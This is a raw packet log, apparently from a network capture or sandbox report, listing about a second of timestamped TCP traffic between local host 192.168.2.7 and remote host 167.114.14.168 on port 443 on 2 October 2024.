                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.732588053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.732609034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.732723951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.732733965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.732801914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.818511009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.818536043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.818798065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.818834066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.818891048 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819179058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819197893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819248915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819273949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819317102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819317102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819756031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819771051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819864988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819864988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.819874048 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.820362091 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.820379972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.820419073 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.820426941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.820453882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.820512056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.820939064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.820952892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.821017981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.821026087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.821064949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.821647882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.821664095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.821749926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.821749926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.821760893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.822243929 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.822262049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.822364092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.822364092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.822375059 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.823158979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.823173046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.823360920 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.823375940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.823424101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.927772045 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.927798986 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.927932978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.927975893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.928050995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.928417921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.928433895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.928503990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.928514004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.928549051 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.928982973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.928997993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.929083109 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.929083109 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.929094076 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.929203033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930111885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930129051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930243969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930254936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930316925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930675983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930691957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930814028 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930823088 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.930898905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.931416988 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.931435108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.931473017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.931480885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.931499004 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.931565046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.932673931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.933017969 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.933043957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.933099031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.933110952 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.933126926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.934823036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.934844971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.934931993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.934931993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.934951067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:58.936923981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.018371105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.018399954 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.018532038 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.018570900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.018661022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019328117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019345999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019416094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019416094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019439936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019550085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019567013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019596100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019604921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019632101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.019644022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.020756006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.020771980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.020850897 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.020850897 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.020873070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021459103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021478891 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021512985 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021528006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021542072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021574020 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021748066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021761894 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021796942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021805048 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021847963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.021847963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.022830009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.023472071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.023487091 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.023556948 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.023572922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.023627043 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.025206089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.025221109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.025311947 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.025332928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.025373936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.108958960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.108984947 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109040976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109066963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109088898 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109499931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109520912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109555006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109564066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109595060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.109616041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.110220909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.110236883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.110284090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.110301018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.110320091 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.111371040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.111401081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.111428022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.111449003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.111495018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.111495018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.111999035 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112015009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112073898 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112073898 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112092018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112399101 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112426043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112468958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112483978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112493992 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.112577915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.114053011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.114070892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.114124060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.114144087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.114187002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.114536047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.114536047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.115906000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.115927935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.115977049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.115998030 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.116086006 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.116950035 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.200659037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.200690031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.200807095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.200807095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.200834990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.201541901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.201562881 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.201662064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.201662064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.201682091 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.202451944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.202466011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.202579975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.202579975 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.202601910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.203115940 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.203628063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.203644991 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.203696966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.203716993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.203754902 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.204319954 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.204336882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.204410076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.204421997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.204473019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.205210924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.205225945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.205291986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.205302954 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.205355883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.205579042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.206706047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.206727028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.206778049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.206790924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.206804991 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.206969976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.208199978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.208216906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.208288908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.208307981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.208357096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290222883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290247917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290332079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290354013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290404081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290725946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290745020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290796995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290806055 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.290867090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.291397095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.291416883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.291460037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.291475058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.291493893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.291517973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.292562962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.292581081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.292640924 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.292654037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.292676926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.292789936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.293071032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.293092966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.293184996 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.293184996 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.293201923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.293926001 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.293948889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.294055939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.294055939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.294076920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.295221090 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.295238972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.295247078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.295270920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.295286894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.295309067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.295399904 CEST49713443192.168.2.7167.114.14.168
